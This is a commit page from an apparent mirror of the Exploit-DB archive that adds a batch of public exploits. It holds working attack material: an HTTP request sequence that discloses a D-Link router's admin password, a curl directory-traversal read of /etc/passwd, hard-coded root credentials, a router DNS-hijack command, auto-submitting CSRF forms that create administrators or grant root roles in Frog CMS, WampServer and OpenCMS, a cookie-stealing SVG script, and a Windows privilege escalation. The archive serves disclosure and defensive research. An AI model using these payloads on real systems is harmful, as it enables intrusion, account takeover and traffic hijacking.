bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2018-04-03

Browse source 
11 changes to exploits/shellcodes

WebLog Expert Enterprise 9.4 - Privilege Escalation

Tenda FH303/A300 Firmware V5.07.68_EN - Remote DNS Change
Tenda FH303/A300 Firmware v5.07.68_EN - Remote DNS Change

Tenda W3002R/A302/w309r Wireless Router V5.07.64_en - Remote DNS Change (PoC)
Tenda W3002R/A302/w309r Wireless Router v5.07.64_en - Remote DNS Change (PoC)
Frog CMS 0.9.5 - Cross-Site Request Forgery (Add User)
WampServer 3.1.1 - Cross-Site Scripting / Cross-Site Request Forgery
WampServer 3.1.2 - Cross-Site Request Forgery
VideoFlow Digital Video Protection (DVP) 2.10 - Directory Traversal
VideoFlow Digital Video Protection (DVP) 2.10 - Hard-Coded Credentials
DLink DIR-601 - Admin Password Disclosure
OpenCMS 10.5.3 - Cross-Site Request Forgery
OpenCMS 10.5.3 - Cross-Site Scripting
Secutech RiS-11/RiS-22/RiS-33 - Remote DNS Change
This commit is contained in:
Offensive Security 2018-04-03 05:01:54 +00:00
parent a13c4ea572
commit b6b60b70e9
12 changed files with 781 additions and 3 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

91
exploits/hardware/webapps/44387.txt Normal file
View file

@ -0,0 +1,91 @@
VideoFlow Digital Video Protection DVP 10 Authenticated Root Remote Code Execution
Vendor: VideoFlow Ltd.
Product web page: http://www.video-flow.com
Affected version: 2.10 (X-Prototype-Version: 1.6.0.2)
System = Indicate if the DVP is configured as Protector, Sentinel or Fortress
Version = The Operating System SW version number
Image version = Production Image version
System: DVP Protector
Version: 1.40.0.15(R) May 5 2015 05:27:05
Image version: 3.07i
System: DVP Protector
Version: 1.40.0.15(R) May 5 2015 05:27:05
Image version: 2.08
System: DVP Fortress
Version: 2.10.0.5(R) Jan 7 2018 03:26:35
Image version: 3.07
Summary: VideoFlow's Digital Video Protection (DVP) product is used by
leading companies worldwide to boost the reliability of IP networks, including
the public Internet, for professional live broadcast. DVP enables broadcast
companies to confidently contribute and distribute live video over IP with
unprecedented levels of service continuity, at a fraction of the cost of
leased lines or satellite links. It accelerates ROI by reducing operational
costs and enabling new revenue streams across a wide variety of markets.
Desc: The affected device suffers from authenticated remote code execution
vulnerability. Including a CSRF, a remote attacker can exploit this issue
and execute arbitrary system commands granting her system access with root
privileges.
Tested on: CentOS release 5.6 (Final) (2.6.18-238.12.1.el5)
CentOS release 5.10 (Final) (2.6.18-371.el5)
ConfD
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2018-5455
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5455.php
01.02.2018
---
Default credentials (web management):
admin:admin
oper:oper
private:private
public:public
devel:devel
Hard-Coded credentials (ssh):
root:videoflow
mom:$1$CGgdGXXG$0FmyyKMzcHgkKnUTZi5r./
-------------------------------- > Tools > System > Shell > --------------------------------
| |
| sh-3.2# id;pwd;uname -a;ls |
| uid=0(root) gid=0(root) |
| /dvp100/confd |
| Linux localhost.localdomain 2.6.18-371.el5 #1 SMP Tue Oct 1 08:37:57 EDT 2013 i6 |
| 86 i686 i386 GNU/Linux |
| aaa_cdb.fxs ietf-inet-types.fxs SNMP-USER-BASED-SM-MIB.fxs |
| authorization.fxs ietf-yang-types.fxs SNMPv2-MIB.fxs |
| browser.log IF-MIB.bin SNMPv2-SMI.fxs |
| community_init.xml IF-MIB.fxs SNMPv2-TC.fxs |
| confd.conf IPV6-TC.fxs SNMP-VIEW-BASED-ACM-MIB.fxs |
| config.web Makefile TRANSPORT-ADDRESS-MIB.fxs |
| docroot SNMP-COMMUNITY-MIB.fxs users.fxs |
| dvp.fxs SNMP-FRAMEWORK-MIB.fxs vacm_init.xml |
| dvp_init.xml SNMP-MPD-MIB.fxs webspec.dat |
| IANAifType-MIB.bin SNMP-NOTIFICATION-MIB.fxs |
| IANAifType-MIB.fxs SNMP-TARGET-MIB.fxs |
| sh-3.2# cat /etc/issue |
| CentOS release 5.10 (Final) |
| Kernel \r on an \m |
| |
--------------------------------------------------------------------------------------------

179
exploits/hardware/webapps/44388.txt Normal file
View file

@ -0,0 +1,179 @@
# Exploit Title: DLink DIR-601 Unauthenticated Admin password disclosure
# Google Dork: N/A
# Date: 12/24/2017
# Exploit Author: Kevin Randall
# Vendor Homepage: https://www.dlink.com
# Software Link: N/A
# Version: Firmware: 2.02NA Hardware Version B1
# Tested on: Windows 10 + Mozilla Firefox
# CVE : CVE-2018-5708
*Been in contact with William Brown CISO of Dlink and disclosed to the vendor*
1. Description
Having local access to the network but being unauthenticated to the administrator panel, a user can disclose the built in Admin username/password to access the admin panel
2. Proof of Concept
(For proof of concept, the real Admin password is "thisisatest"
Step 1: Access default gateway/router login page
Step 2: Login with Username Admin and put any random password: (This example the password is test)
POST /my_cgi.cgi?0.06201226210472943 HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Referer: http://192.168.0.1/login_real.htm
Content-Type: application/x-www-form-urlencoded
Content-Length: 74
DNT: 1
Connection: close
request=login&admin_user_name=YWRtaW4A&admin_user_pwd=dGVzdA==&user_type=0
Step 3: Clear Password that was set:
POST /my_cgi.cgi?0.06201226210472943 HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Referer: http://192.168.0.1/login_real.htm
Content-Type: application/x-www-form-urlencoded
Content-Length: 74
DNT: 1
Connection: close
request=login&admin_user_name=YWRtaW4A&admin_user_pwd=&user_type=0
Step 4: The following POST request will come back or a variant:
POST /my_cgi.cgi?0.322727424911867 HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Referer: http://192.168.0.1/back.htm
Content-Type: application/x-www-form-urlencoded
Content-Length: 73
DNT: 1
Connection: close
request=no_auth&request=load_settings&table_name=fw_ver&table_name=hw_ver
Change the request=no_auth to "request=auth"
POST /my_cgi.cgi?0.322727424911867 HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Referer: http://192.168.0.1/back.htm
Content-Type: application/x-www-form-urlencoded
Content-Length: 73
DNT: 1
Connection: close
request=auth&request=load_settings&table_name=fw_ver&table_name=hw_ver
Step 5: Forward the request:
Step 6: Forward the following request:
POST /my_cgi.cgi?0.8141419425197141 HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Referer: http://192.168.0.1/back.htm
Content-Type: application/x-www-form-urlencoded
Content-Length: 20
DNT: 1
Connection: close
request=show_message
Step 7: You will then be presented with the following: "Invalid user name or password, please try again"
Step 8: Click Continue
Step 9: You will see a POST request come back similar to the following:
POST /my_cgi.cgi?0.12979015154204587 HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Referer: http://192.168.0.1/login.htm
Content-Type: application/x-www-form-urlencoded
Content-Length: 68
DNT: 1
Connection: close
request=no_auth&request=load_settings&table_name=get_restore_default
Step 10: Change the parameters "request=no_auth" to "request=auth" and "table_name=get_restore_default" to "table_name=restore_default"
POST /my_cgi.cgi?0.12979015154204587 HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Referer: http://192.168.0.1/login.htm
Content-Type: application/x-www-form-urlencoded
Content-Length: 68
DNT: 1
Connection: close
request=auth&request=load_settings&table_name=restore_default
Step 11: Forward the request:
Step 12: You will see the following POST request come back or a variant of it:
POST /my_cgi.cgi?0.5566044428265032 HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Referer: http://192.168.0.1/wizard_default.htm
Content-Type: application/x-www-form-urlencoded
Content-Length: 278
DNT: 1
Connection: close
request=no_auth&request=load_settings&table_name=get_restore_default&table_name=wan_settings&table_name=wan_static&table_name=wan_pppoe&table_name=wan_pptp&table_name=wan_l2tp&table_name=wireless_settings&table_name=admin_user&table_name=time&table_name=fw_ver&table_name=hw_ver
Step 13: In BurpSuite, right click on the POST request and choose: "Do Intercept" "Response from this request":
Step 14: In XML cleartext, configuration information is obtained including the Admin username and password "thisisatest"
HTTP/1.1 200 OK
Content-type: text/xml
Connection: close
Date: Sat, 06 Jan 2018 13:33:26 GMT
Server: lighttpd/1.4.28
Content-Length: 2414
<?xml version="1.0" encoding="UTF-8"?><root><restore_default>0</restore_default><wan_settings><wan_type>0</wan_type><wan_mac>44:8a:5b:8d:ba:13</wan_mac><primary_dns></primary_dns><secondary_dns></secondary_dns><enable_advanced_dns>1</enable_advanced_dns></wan_settings><wan_static><static_ip_addr>0.0.0.0</static_ip_addr><static_subnet_mask>0.0.0.0</static_subnet_mask><static_gateway>0.0.0.0</static_gateway><static_mtu>1500</static_mtu></wan_static><wan_pppoe><pppoe_conn_type>0</pppoe_conn_type><pppoe_user_name></pppoe_user_name><pppoe_user_pwd></pppoe_user_pwd><pppoe_service_name></pppoe_service_name><pppoe_ip_addr>0.0.0.0</pppoe_ip_addr><pppoe_conn_mode>on_demand</pppoe_conn_mode><pppoe_max_idle_time>300</pppoe_max_idle_time><pppoe_mtu>1492</pppoe_mtu></wan_pppoe><wan_pptp><pptp_conn_type>0</pptp_conn_type><pptp_ip_addr>0.0.0.0</pptp_ip_addr><pptp_subnet_mask>0.0.0.0</pptp_subnet_mask><pptp_gateway>0.0.0.0</pptp_gateway><pptp_server_ip></pptp_server_ip><pptp_user_name></pptp_user_name><pptp_user_pwd></pptp_user_pwd><pptp_conn_mode>on_demand</pptp_conn_mode><pptp_max_idle_time>300</pptp_max_idle_time><pptp_mtu>1400</pptp_mtu></wan_pptp><wan_l2tp><l2tp_conn_type>0</l2tp_conn_type><l2tp_ip_addr>0.0.0.0</l2tp_ip_addr><l2tp_subnet_mask>0.0.0.0</l2tp_subnet_mask><l2tp_gateway>0.0.0.0</l2tp_gateway><l2tp_server_ip></l2tp_server_ip><l2tp_user_name></l2tp_user_name><l2tp_user_pwd></l2tp_user_pwd><l2tp_conn_mode>on_demand</l2tp_conn_mode><l2tp_max_idle_time>300</l2tp_max_idle_time><l2tp_mtu>1400</l2tp_mtu></wan_l2tp><wireless_settings><enable_wireless>1</enable_wireless><wireless_schedule>Always</wireless_schedule><ssid>HomeAP</ssid><channel>3</channel><auto_channel>0</auto_channel><dot11_mode>11gn</dot11_mode><channel_width>0</channel_width><ssid_broadcast>1</ssid_broadcast></wireless_settings><admin_user><admin_user_name>admin</admin_user_name><admin_user_pwd>thisisatest</admin_user_pwd><admin_level>1</admin_level></admin_user><time><zone_index>12</zone_index><time_zone>-80</time_zone><ntp_enable>1</ntp_enable><ntp_server>time.nist.gov</ntp_server><manual_year>2011</manual_year><manual_month>1</manual_month><manual_day>1</manual_day><manual_hour>0</manual_hour><manual_min>0</manual_min><manual_sec>0</manual_sec></time><fw_ver>2.02NA</fw_ver><build_ver>01</build_ver><fw_date>Tue, 11 Nov 2014</fw_date><fw_region>NA</fw_region><hw_ver>B1</hw_ver></root>
3. Solution:
N/A. Unknown as of the moment

62
exploits/hardware/webapps/44393.sh Executable file
View file

@ -0,0 +1,62 @@
#
#
# Secutech RiS-11/RiS-22/RiS-33 V5.07.52_es_FRI01
# Remote DNS Change PoC
#
# Copyright 2018 (c) Todor Donev <todor.donev at gmail.com>
# https://ethical-hacker.org/
# https://facebook.com/ethicalhackerorg
#
#
# Once modified, systems use foreign DNS servers, which are
# usually set up by cybercriminals. Users with vulnerable
# systems or devices who try to access certain sites are
# instead redirected to possibly malicious sites.
#
# Modifying systems' DNS settings allows cybercriminals to
# perform malicious activities like:
#
# o Steering unknowing users to bad sites:
# These sites can be phishing pages that
# spoof well-known sites in order to
# trick users into handing out sensitive
# information.
#
# o Replacing ads on legitimate sites:
# Visiting certain sites can serve users
# with infected systems a different set
# of ads from those whose systems are
# not infected.
#
# o Controlling and redirecting network traffic:
# Users of infected systems may not be granted
# access to download important OS and software
# updates from vendors like Microsoft and from
# their respective security vendors.
#
# o Pushing additional malware:
# Infected systems are more prone to other
# malware infections (e.g., FAKEAV infection).
#
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
#
GET -H "Cookie: admin:language=en; path=/" "http://<TARGET>/goform/AdvSetDns?GO=wan_dns.asp&rebootTag=&DSEN=1&DNSEN=on&DS1=<DNS1>&DS2=<DNS2>" 2>/dev/null

108
exploits/perl/webapps/44386.txt Normal file
View file

@ -0,0 +1,108 @@
VideoFlow Digital Video Protection DVP 10 Authenticated Directory Traversal
Vendor: VideoFlow Ltd.
Product web page: http://www.video-flow.com
Affected version: 2.10 (X-Prototype-Version: 1.6.0.2)
System = Indicate if the DVP is configured as Protector, Sentinel or Fortress
Version = The Operating System SW version number
Image version = Production Image version
System: DVP Protector
Version: 1.40.0.15(R) May 5 2015 05:27:05
Image version: 3.07i
System: DVP Protector
Version: 1.40.0.15(R) May 5 2015 05:27:05
Image version: 2.08
System: DVP Fortress
Version: 2.10.0.5(R) Jan 7 2018 03:26:35
Image version: 3.07
Summary: VideoFlow's Digital Video Protection (DVP) product is used by
leading companies worldwide to boost the reliability of IP networks, including
the public Internet, for professional live broadcast. DVP enables broadcast
companies to confidently contribute and distribute live video over IP with
unprecedented levels of service continuity, at a fraction of the cost of
leased lines or satellite links. It accelerates ROI by reducing operational
costs and enabling new revenue streams across a wide variety of markets.
Desc: The application suffers from an authenticated arbitrary file disclosure
vulnerability including no session expiration. Input passed via the 'ID' parameter
in several Perl scripts is not properly verified before being used to download
system files. This can be exploited to disclose the contents of arbitrary
files via directory traversal attacks.
Scripts affected:
$ grep -rnH "Content-Disposition" .
./download.pl:30: print "Content-Disposition:attachment;filename=$ID\n\n";
./download_xml.pl:23: print "Content-Disposition:attachment;filename=$ID\n\n";
./downloadmib.pl:22: print "Content-Disposition:attachment;filename=$ID\n\n";
./downloadFile.pl:30: print "Content-Disposition:attachment;filename=$OUTNAME\n\n";
./downloadsys.pl:22: print "Content-Disposition:attachment;filename=$ID\n\n";
----------------------------------------------------------------------------
/dvp100/confd/docroot/cgi-bin/downloadsys.pl:
---------------------------------------------
1 #!/usr/bin/perl -wT
2 # http://www.sitepoint.com/file-download-script-perl/
3
4 use strict;
5 use CGI;
6 use CGI::Carp qw ( fatalsToBrowser );
7 my $files_location;
8 my $query = CGI->new;
9 my $ID = $query->param('ID');
10 my @fileholder;
11
12 $files_location = "/dvp100/confd/docroot/cgi-bin/";
13 #$ID = "syslog.tar.gz"; #param('ID');
14
15 if ($ID eq '') {
16
17 } else {
18 open(DLFILE, "<$files_location/$ID") || Error('open', 'file');
19 @fileholder = <DLFILE>;
20 close (DLFILE) || Error ('close', 'file');
21 print "Content-Type:application/x-download\n";
22 print "Content-Disposition:attachment;filename=$ID\n\n";
23 print @fileholder;
24 }
----------------------------------------------------------------------------
Tested on: CentOS release 5.6 (Final) (2.6.18-238.12.1.el5)
CentOS release 5.10 (Final) (2.6.18-371.el5)
ConfD
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2018-5454
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5454.php
01.02.2018
---
curl 'http://17.17.17.17/cgi-bin/downloadsys.pl?ID=../../../../etc/passwd' -H Cookie:sessionid=sess3638473331458218
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
...
...

58
exploits/php/webapps/44383.html Normal file
View file

@ -0,0 +1,58 @@
# Exploit Title: Cross Site Request Forgery- Frog CMS
# Date: 31-03-2018
# Exploit Author: Samrat Das
# Contact: http://twitter.com/Samrat_Das93
# Website: https://securitywarrior9.blogspot.in/
# Vendor Homepage: https://github.com/philippe/FrogCMS
# Version: 0.9.5
# CVE : CVE-2018-8908
# Category: Webapp CMS
1. Description
The application source code is coded in a way which allows malicious HTML
request to be executed without veryifying source of request.This leads to
arbitary execution with malicous request which will lead to the creation of
a privileged user.
2. Proof of Concept
Visit the application
Visit the Add Users Page.
Craft an html page with all the details for an admin user creation
and host it on a server
Upon the link being clicked by a logged in admin user, immidiately,
another admin user will get created.
Exploit Code:
<html>
<body>
<form action="http://localhost/frog/admin/?/user/add" method="POST">
<input type="hidden" name="user&#91;name&#93;" value="Test&#95;1" />
<input type="hidden" name="user&#91;email&#93;" value="" />
<input type="hidden" name="user&#91;username&#93;" value="test" />
<input type="hidden" name="user&#91;password&#93;" value="test" />
<input type="hidden" name="user&#91;confirm&#93;" value="test" />
<input type="hidden"
name="user&#95;permission&#91;administrator&#93;" value="1" />
<input type="hidden" name="commit" value="Save" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
3. Solution:
Solution - Fix & Patch: The application code should be configured to
implement anti csrf token to filter malicous HTTP Requests.
4. Public Reference with POC and steps:
http://securitywarrior9.blogspot.in/2018/03/cross-site-request-forgery-frog-cms-cve.html
Thanks and Regards
Samrat

51
exploits/php/webapps/44384.txt Normal file
View file

@ -0,0 +1,51 @@
# Exploit Title: WampServer 3.1.1 XSS via CSRF
# Date: 31-03-2018
# Software Link: http://www.wampserver.com/en/
# Version: 3.1.1
# Tested On: Windows 10
# Exploit Author: Vipin Chaudhary
# Contact: http://twitter.com/vipinxsec
# Website: http://medium.com/@vipinxsec
# CVE: CVE-2018-8732
1. Description
XSS: cross site scripting via CSRF is remotely exploitable.
http://forum.wampserver.com/read.php?2,138295,150615,page=6#msg-150615
http://forum.wampserver.com/read.php?2,150617
2. Proof of Concept
How to exploit this XSS vulnerability:
1. Go to Add a Virtual host and add one to wampserver.
2. Go to Supress Virtual host and select one to delete and then intercept
the request using burp suite or any other proxy tool
3. Change the value of parameter *virtual_del[] *to "><img src=x
onerror=alert(1)> and forward it then you will see the XSS triggered.
How to see it:
1. Copy and paste this CSRF request in notepad and save it as anything.html
<html>
<body onload="wamp_csrf.submit();">
<form action="[localhost]; name="wamp_csrf" method="POST">
<input type="hidden" name="virtual&#95;del&#91;&#93;"
value=""><img&#32;src&#61;x&#32;onerror&#61;alert&#40;1&#41;>"
/>
<input type="hidden" name="vhostdelete"
value="Suppress&#32;VirtualHost" />
</form>
</body>
</html>
Warning: action="[localhost] is action='
http://localhost/add_vhost.php?lang=english' replacing simple quotes(') by
double quote("[image: winking smiley]
3. Solution:
Update to version 3.1.3
http://www.wampserver.com/en/#download-wrapper

47
exploits/php/webapps/44385.html Normal file
View file

@ -0,0 +1,47 @@
# Exploit Title: WampServer 3.1.2 CSRF to add or delete any virtual hostsremotely
# Date: 31-03-2018
# Software Link: http://www.wampserver.com/en/
# Version: 3.1.2
# Tested On: Windows 10
# Exploit Author: Vipin Chaudhary
# Contact: http://twitter.com/vipinxsec
# Website: http://medium.com/@vipinxsec
# CVE: CVE-2018-8817
1. Description
CSRF (Cross site request forgery) in WampServer 3.1.2 which allows a remote
attacker to force any victim to add or delete virtual hosts.
http://forum.wampserver.com/read.php?2,138295,150722,page=6#msg-150722
2. Proof of Concept
How to exploit this CSRF vulnerability:
1. Go to Add a Virtual host and add one to wampserver.
2. Now intercept the request with proxy tool like burp suite.
3. Now make a CSRF PoC of the request and to exploit you can host it on
internet and send the link to the victim.
*Exploit Code for deleting any host remotely:*
1. Copy and paste this CSRF request in notepad and save it as anything.html
<html>
<body onload="wamp_csrf.submit();">
<form action="http://localhost/add_vhost.php?lang=english"
name="wamp_csrf" method="POST">
<input type="hidden" name="virtual&#95;del&#91;&#93;"
value="localhost" />
<input type="hidden" name="vhostdelete" value="Suppress&#32;VirtualHost"
/>
</form>
</body>
</html>
2. Then run it on your installed vulnerable wampserver.
3. Solution:
Update to version 3.1.3
http://www.wampserver.com/en/#download-wrapper

73
exploits/php/webapps/44391.html Normal file
View file

@ -0,0 +1,73 @@
# Exploit Title: OpenCMS 10.5.3 Multiple Cross Site Request Forgery Vulnerabilities
Injection
# Google Dork: N/A
# Date: 02-04-2018
#######################################
# Exploit Author: Sureshbabu Narvaneni
# Author Blog : http://nullnews.in
# Vendor Homepage: http://www.opencms.org/en/
# Software Link: http://www.opencms.org/en/modules/downloads/begindownload.html?id=a7747cd0-b27b-11e7-8299-7fde8b0295e1
# Affected Version: 10.5.3
# Category: WebApps
# Tested on: Ubuntu 14.04 x86_64/Kali Linux 4.12 i686
# CVE : CVE-2018-8811
1. Vendor Description:
OpenCms from Alkacon Software is a professional, easy to use website content management system. OpenCms helps content managers worldwide to create and maintain beautiful websites fast and efficiently.
2. Technical Description:
Cross-site request forgery (CSRF) vulnerability in system/workplace/admin/accounts/user_role.jsp in OpenCMS 10.5.3 allows remote attackers to hijack the authentication of administrative users for requests that perform privilege escalation.
3. Proof Of Concept:
a) Send below crafted request to logged in user who is having Root Administrator level access.
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://[DomainName]/opencms/system/workplace/admin/accounts/user_role.jsp" method="POST">
<input type="hidden" name="dialogtype" value="" />
<input type="hidden" name="root" value="" />
<input type="hidden" name="sortcol" value="" />
<input type="hidden" name="preactiondone" value="" />
<input type="hidden" name="oufqn" value="" />
<input type="hidden" name="resource" value="" />
<input type="hidden" name="userid" value="Replace with actual user id of low privileged user." />
<input type="hidden" name="closelink" value="&#37;2Fopencms&#37;2Fsystem&#37;2Fworkplace&#37;2Fviews&#37;2Fadmin&#37;2Fadmin&#45;main&#46;jsp&#37;3Fpath&#37;3D&#37;2Faccounts&#37;2Forgunit&#37;2Fusers&#37;26action&#37;3Dinitial" />
<input type="hidden" name="framename" value="" />
<input type="hidden" name="ispopup" value="" />
<input type="hidden" name="originalparams" value="" />
<input type="hidden" name="message" value="" />
<input type="hidden" name="selitems" value="RoleRootAdmins" />
<input type="hidden" name="title" value="" />
<input type="hidden" name="style" value="new" />
<input type="hidden" name="page" value="" />
<input type="hidden" name="base" value="" />
<input type="hidden" name="path" value="&#37;2Faccounts&#37;2Forgunit&#37;2Fusers&#37;2Fedit&#37;2Frole" />
<input type="hidden" name="action" value="listmultiaction" />
<input type="hidden" name="searchfilter" value="" />
<input type="hidden" name="redirect" value="" />
<input type="hidden" name="force" value="" />
<input type="hidden" name="formname" value="lsre&#45;form" />
<input type="hidden" name="listaction" value="ma" />
<input type="hidden" name="listMultiAction" value="RoleRootAdmins" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
b) Once the logged in user opens the URL the form will get submitted with active session of root administrator and action get performed successfully.
c) By leveraging this vulnerability user can gain Root Level Administrator Access to the CMS.
4. Solution:
Upgrade to latest release.
http://www.opencms.org/en/home/news.html
5. Reference:
https://github.com/alkacon/opencms-core/issues/586
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-8811

51
exploits/php/webapps/44392.txt Normal file
View file

@ -0,0 +1,51 @@
# Exploit Title: OpenCMS 10.5.3 Stored Cross Site Scripting Vulnerability
# Google Dork: N/A
# Date: 02-04-2018
#######################################
# Exploit Author: Sureshbabu Narvaneni
# Author Blog : http://nullnews.in
# Vendor Homepage: http://www.opencms.org/en/
# Software Link: http://www.opencms.org/en/modules/downloads/begindownload.html?id=a7747cd0-b27b-11e7-8299-7fde8b0295e1
# Affected Version: 10.5.3
# Category: WebApps
# Tested on: Ubuntu 14.04 x86_64/Kali Linux 4.12 i686
# CVE : CVE-2018-8815
1. Vendor Description:
OpenCms from Alkacon Software is a professional, easy to use website
content management system. OpenCms helps content managers worldwide to
create and maintain beautiful websites fast and efficiently.
2. Technical Description:
Cross-site scripting (XSS) vulnerability in the gallery function in Alkacon
OpenCMS 10.5.3 allows remote attackers to inject arbitrary web script or
HTML via a malicious SVG image.
3. Proof Of Concept:
a) Login as user who is having Gallery Editor role.
b) Navigate to gallery and upload below svg file.
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "
http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900"
stroke="#004400"/>
<script type="text/javascript">
alert(document.cookie);
</script>
</svg>
c) Once other user who is having Root Administrator permissions visited the
image link or viewed the uploaded svg image the script get executed.
4. Solution:
Upgrade to latest release.
http://www.opencms.org/en/home/news.html
5. Reference:
https://github.com/alkacon/opencms-core/issues/587
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-8815

1
exploits/windows/local/44382.py
View file

@ -16,7 +16,6 @@ After hitting enter new device, click Enter device manually
#!/usr/bin/python
import socket
# Create an array of buffers, from 1 to 5900, with increments of 200.
calc = ("\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b"
"\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"

49
exploits/windows/local/44389.txt Normal file
View file

@ -0,0 +1,49 @@
Exploit Author: bzyo
Twitter: @bzyo_
Exploit Title: WebLog Expert Enterprise 9.4 - Privilege Escalation
Date: 03-31-2018
Vulnerable Software: WebLog Expert Enterprise 9.4
Vendor Homepage: https://www.weblogexpert.com/
Version: 9.4
Software Link: https://www.weblogexpert.com/download.htm
Tested On: Windows 7 x86 and x64
Details:
By default WebLog Expert Enterprise 9.4 runs scheduled tasks under Local System account.
If WebLog Expert Schedule Service is installed by an administrator, regular users have the
ability to run tasks as Local System.
Exploit:
1. Login as regular user where WebLog Expert and WebLog Expert Schedule Service are installed
2. Open WebLog Expert and then Schedule
3. Select Add, Next, choose 'Sample - HTML' under Profile, Next
4. Check 'Run command...' box, fill in 'Command' and 'Run in' as listed below
Command: C:\Windows\System32\cmd.exe
Run in: C:\Windows\System32\
5. Select Next, Finish, Highlight New Task, select Run Now
6. Pop-up will appear in taskbar that reads 'A program running on this computer is trying to display a message'
7. Select 'View the message'
8. Command prompt is shown
C:\Windows\system32>whoami
nt authority\system
Prerequisites:
To successfully exploit this vulnerability, an attacker must already have access
to a system running WebLog Expert and WebLog Expert Schedule Service using a
low-privileged user account
Risk:
The vulnerability allows local attackers to escalate privileges and execute
arbitrary code as Local System aka Game Over.
Fix:
Under Schedule Options, change default account that runs scheduled tasks

14
files_exploits.csv
View file

@ -9626,6 +9626,7 @@ id,file,description,date,author,type,platform,port
44364,exploits/windows/local/44364.py,"Allok Video Joiner 4.6.1217 - Stack-Based Buffer Overflow",2018-03-30,"Mohan Ravichandran and Velayutham Selvaraj",local,windows,
44365,exploits/windows/local/44365.py,"Allok WMV to AVI MPEG DVD WMV Converter 4.6.1217 - Buffer Overflow",2018-03-30,"Mohan Ravichandran and Velayutham Selvaraj",local,windows,
44382,exploits/windows/local/44382.py,"Faleemi Windows Desktop Software - (DDNS/IP) Local Buffer Overflow",2018-03-30,"Himavanth Reddy",local,windows,
44389,exploits/windows/local/44389.txt,"WebLog Expert Enterprise 9.4 - Privilege Escalation",2018-04-02,bzyo,local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -39079,6 +39080,15 @@ id,file,description,date,author,type,platform,port
44374,exploits/php/webapps/44374.py,"osCommerce 2.3.4.1 - Remote Code Execution",2018-03-30,"Simon Scannell",webapps,php,
44377,exploits/asp/webapps/44377.txt,"Tenda W316R Wireless Router 5.07.50 - Remote DNS Change",2018-03-30,"Todor Donev",webapps,asp,
44378,exploits/php/webapps/44378.txt,"D-Link DIR-850L Wireless AC1200 Dual Band Gigabit Cloud Router - Authentication Bypass",2018-03-30,"Gem George",webapps,php,
